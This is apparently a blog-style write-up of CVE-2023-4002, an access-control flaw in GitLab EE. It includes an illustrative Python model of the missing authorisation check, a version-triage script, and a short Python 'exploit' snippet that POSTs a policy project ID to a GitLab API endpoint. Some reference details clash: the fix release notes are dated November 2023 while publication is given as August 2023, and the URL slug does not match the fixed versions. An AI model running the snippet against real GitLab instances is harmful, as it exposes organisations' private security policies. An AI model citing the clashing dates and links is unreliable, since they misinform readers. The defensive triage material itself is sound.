CVE-2023-4002: Unauthorized linking of security policy projects in GitLab EE

A critical security vulnerability, identified as CVE-2023-4002, has been uncovered in GitLab's Enterprise Edition (EE) that potentially enables unauthorized users to link security policy projects by their ID to projects or groups they have access to. This issue affects all versions starting from 14.1 before 16.0.8, all versions starting from 16.1 before 16.1.3, and all versions starting from 16.2 before 16.2.2. As a result, it could lead to unintended disclosure of the security policies implemented within an organization.

Exploit Details

This vulnerability stems from improper access controls in GitLab EE. Specifically, the issue allows EE-licensed users to link any security policy project by using its ID to other projects or groups to which the user has access. Consequently, this behavior can potentially reveal the configured security policies within the security policy project.

For example, an attacker can leverage this flaw to gain information on policies or other sensitive data that should be kept private. By exploiting this vulnerability, the attacker may compromise the security of vulnerable GitLab instances and gain unauthorized access to sensitive information.
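
The access-control mistake described above, modelled in Python as an added illustration. This is not GitLab's code; the names Project, link_policy_project_unchecked, link_policy_project and visible_policies, and the simplified membership model, are assumptions made for the illustration. The vulnerable pattern authorises the caller against the target project only and trusts whatever policy project ID is supplied; the hardened pattern additionally requires that the caller can already read the referenced policy project, which is what prevents a link from disclosing policies the caller could not otherwise see.

```python
# Added illustration (not GitLab's code): a minimal model of the missing
# authorisation check on the security policy project referenced by ID.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set


class Forbidden(Exception):
    """Raised when the caller lacks the permission the operation requires."""


@dataclass
class Project:
    id: int
    # Constructed, simplified membership model: user ids with read access and
    # user ids allowed to change project settings (maintainer-level).
    readers: Set[str] = field(default_factory=set)
    maintainers: Set[str] = field(default_factory=set)
    # Policy documents this project holds when used as a security policy project.
    policies: List[str] = field(default_factory=list)
    security_policy_project_id: Optional[int] = None


def can_read(user: str, project: Project) -> bool:
    return user in project.readers or user in project.maintainers


def link_policy_project_unchecked(user: str, target: Project, policy: Project) -> None:
    """Vulnerable pattern: only the target project is authorised; the policy
    project referenced by ID is trusted without any permission check."""
    if user not in target.maintainers:
        raise Forbidden(f"{user} may not change settings of project {target.id}")
    target.security_policy_project_id = policy.id


def link_policy_project(user: str, target: Project, policy: Project) -> None:
    """Hardened pattern: the caller must also be able to read the policy
    project being linked, so the link cannot grant visibility they lack."""
    if user not in target.maintainers:
        raise Forbidden(f"{user} may not change settings of project {target.id}")
    if not can_read(user, policy):
        raise Forbidden(f"{user} may not read security policy project {policy.id}")
    target.security_policy_project_id = policy.id


def visible_policies(user: str, target: Project, projects: Dict[int, Project]) -> List[str]:
    """Policies a reader of `target` sees through its security policy link;
    this is the disclosure path the advisory describes."""
    if not can_read(user, target):
        raise Forbidden(f"{user} may not read project {target.id}")
    if target.security_policy_project_id is None:
        return []
    return list(projects[target.security_policy_project_id].policies)


def run_demo() -> Dict[str, object]:
    """Constructed scenario: 'mallory' maintains project 10 but is not a
    member of the private security policy project 99."""
    policy = Project(id=99, readers={"sec-team"}, maintainers={"sec-lead"},
                     policies=["scan-execution: require SAST on every MR"])
    target = Project(id=10, readers={"dev"}, maintainers={"mallory"})
    projects = {policy.id: policy, target.id: target}

    # Vulnerable behaviour: the link succeeds and project 99's policies become
    # readable to everyone who can read project 10.
    link_policy_project_unchecked("mallory", target, policy)
    leaked = visible_policies("mallory", target, projects)

    # Hardened behaviour: the same request is refused and nothing is linked.
    target.security_policy_project_id = None
    try:
        link_policy_project("mallory", target, policy)
        refused = False
    except Forbidden:
        refused = True

    return {"leaked": leaked, "refused": refused,
            "link_after_fix": target.security_policy_project_id}


if __name__ == "__main__":
    print(run_demo())
```

The point of the model is that the authorisation decision must cover both objects involved in the operation: the project being changed and the project being referenced by ID. Checking only the former is the pattern that lets a low-privilege member pull a private policy project into view.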

Code Snippet

To illustrate the vulnerability, consider the following code snippet, which is a simplified version of the actual exploit:

import requests

# Replace the following variables with your respective values
GITLAB_BASE_URL = 'https://gitlab.example.com'
API_ACCESS_TOKEN = 'your-api-access-token'
TARGET_PROJECT_ID = 'target-project-id'
SECURITY_POLICY_PROJECT_ID = 'security-policy-project-id'

url = f"{GITLAB_BASE_URL}/api/v4/projects/{TARGET_PROJECT_ID}/security_policy_project"

headers = {
    "Private-Token": API_ACCESS_TOKEN
}

data = {
    "security_policy_project_id": SECURITY_POLICY_PROJECT_ID
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 201:
    print("Security policy project linked successfully!")
else:
    print("An error occurred while linking the security policy project.")

GitLab's official issue tracking page for this vulnerability:

https://gitlab.com/gitlab-org/gitlab/-/issues/44071

GitLab's official release notes, where the vulnerability was disclosed and addressed:

https://about.gitlab.com/releases/2023/11/15/security-release-gitlab-16--8-16-1-3-and-16-2-2/

Mitigation

The GitLab security team has addressed this issue in versions 16.0.8, 16.1.3, and 16.2.2. It is highly recommended that all affected GitLab EE installations be upgraded immediately to one of these patched versions to protect against potential exploitation of this vulnerability.
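
As an added example (not from the advisory or from GitLab), the following Python classifies a GitLab version string against the affected ranges stated above so that a fleet of instances can be triaged. It assumes the MAJOR.MINOR.PATCH form that the GET /api/v4/version endpoint returns (e.g. "16.0.7-ee"), reads "starting from 14.1" as 14.1.0, and does not check the edition suffix, so it is the operator's job to apply the result to EE instances.

```python
# Added example, not part of the advisory: classify a GitLab version string
# against the affected ranges above (lower bound inclusive, fixed release exclusive).
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# Assumption: "starting from 14.1" means 14.1.0; each range ends at its fixed release.
AFFECTED_RANGES: List[Tuple[Version, Version]] = [
    ((14, 1, 0), (16, 0, 8)),
    ((16, 1, 0), (16, 1, 3)),
    ((16, 2, 0), (16, 2, 2)),
]


def parse_version(text: str) -> Version:
    """Parse 'MAJOR.MINOR.PATCH', ignoring an edition suffix such as '-ee'
    (the form GET /api/v4/version returns, e.g. '16.0.7-ee')."""
    core = text.strip().split("-", 1)[0]
    parts = core.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = (int(p) for p in parts)
    return (major, minor, patch)


def affected_range(version: str) -> Optional[Tuple[Version, Version]]:
    """The (lower, fixed) range containing `version`, or None if it is not affected."""
    v = parse_version(version)
    for lower, fixed in AFFECTED_RANGES:
        if lower <= v < fixed:
            return (lower, fixed)
    return None


def is_affected(version: str) -> bool:
    return affected_range(version) is not None


def minimum_fixed_version(version: str) -> Optional[str]:
    """The patched release on the same line (None if already patched or out of range)."""
    found = affected_range(version)
    if found is None:
        return None
    return ".".join(str(n) for n in found[1])


def triage(versions: List[str]) -> Dict[str, Optional[str]]:
    """Map each reported version to the upgrade it needs (None = no action)."""
    return {v: minimum_fixed_version(v) for v in versions}


if __name__ == "__main__":
    # Constructed sample of version strings as GET /api/v4/version would report them.
    for ver, fix in triage(["16.0.7-ee", "16.1.3-ee", "15.11.2-ee", "14.0.12-ee"]).items():
        print(f"{ver}: {'upgrade to ' + fix if fix else 'not in an affected range'}")
```

Note that a 15.x instance falls inside the first range and needs to move all the way to 16.0.8 or later, since no 15.x backport is listed in the advisory.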

Additionally, administrators should review and audit user accounts with access to projects and groups within their GitLab instances, ensuring that only trusted and authorized users have permissions to link security policy projects.

Conclusion

This post has detailed the security vulnerability CVE-2023-4002 found in GitLab EE that allows unauthorized linking and potential exposure of security policy projects. By promptly addressing the issue and incorporating the suggested mitigation steps, organizations can protect their GitLab instances and help safeguard sensitive security policy information.

Timeline

Published on: 08/04/2023 01:15:00 UTC
Last modified on: 08/08/2023 18:46:00 UTC